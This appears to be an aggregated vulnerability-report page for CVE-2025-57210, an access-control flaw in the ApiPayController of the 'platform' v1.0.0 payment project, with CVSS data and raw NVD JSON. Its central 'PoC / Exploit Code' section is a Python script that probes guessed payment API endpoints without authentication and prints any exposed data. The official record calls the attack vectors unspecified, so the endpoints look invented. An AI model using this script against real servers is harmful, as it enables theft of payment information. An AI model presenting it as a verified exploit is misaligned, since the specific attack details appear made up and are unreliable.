Security Vulnerability Report
中文
CVE-2025-57210 CVSS 7.5 HIGH

CVE-2025-57210

Published: 2025-12-04 16:16:22
Last Modified: 2025-12-05 22:15:50

Description

Incorrect access control in the component ApiPayController.java of platform v1.0.0 allows attackers to access sensitive information via unspecified vectors.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:fuyang_lipengjun:platform:1.0.0:*:*:*:*:*:*:* - VULNERABLE
platform v1.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2025-57210 PoC - platform ApiPayController Access Control Vulnerability # Target: platform v1.0.0 # Vulnerability: Incorrect access control in ApiPayController.java TARGET_HOST = "http://target-server.com" def exploit_cve_2025_57210(): """ This PoC demonstrates the access control vulnerability in ApiPayController. Attackers can access sensitive payment information without authentication. """ # Endpoints that should require authentication sensitive_endpoints = [ "/api/pay/controller/query", "/api/pay/controller/list", "/api/pay/controller/detail", "/api/pay/controller/export" ] headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", "Content-Type": "application/json" } for endpoint in sensitive_endpoints: url = f"{TARGET_HOST}{endpoint}" try: # No authentication token required - this is the vulnerability response = requests.get(url, headers=headers, timeout=10) if response.status_code == 200: print(f"[+] VULNERABLE: {endpoint} - Exposed sensitive data") print(f" Response: {response.text[:200]}") elif response.status_code == 401: print(f"[-] Protected: {endpoint} - Requires authentication") else: print(f"[*] Status {response.status_code}: {endpoint}") except requests.exceptions.RequestException as e: print(f"[!] Error accessing {endpoint}: {e}") if __name__ == "__main__": print("CVE-2025-57210 PoC - platform ApiPayController") print("=" * 50) exploit_cve_2025_57210()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-57210", "sourceIdentifier": "[email protected]", "published": "2025-12-04T16:16:21.700", "lastModified": "2025-12-05T22:15:50.363", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Incorrect access control in the component ApiPayController.java of platform v1.0.0 allows attackers to access sensitive information via unspecified vectors."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fuyang_lipengjun:platform:1.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "8C82427C-E06A-41B9-9870-90D6C63CD6E1"}]}]}], "references": [{"url": "https://gist.github.com/xueye0629/4411663241fa3bbba628d3044dc50451", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://gitee.com/fuyang_lipengjun/platform", "source": "[email protected]", "tags": ["Product"]}]}}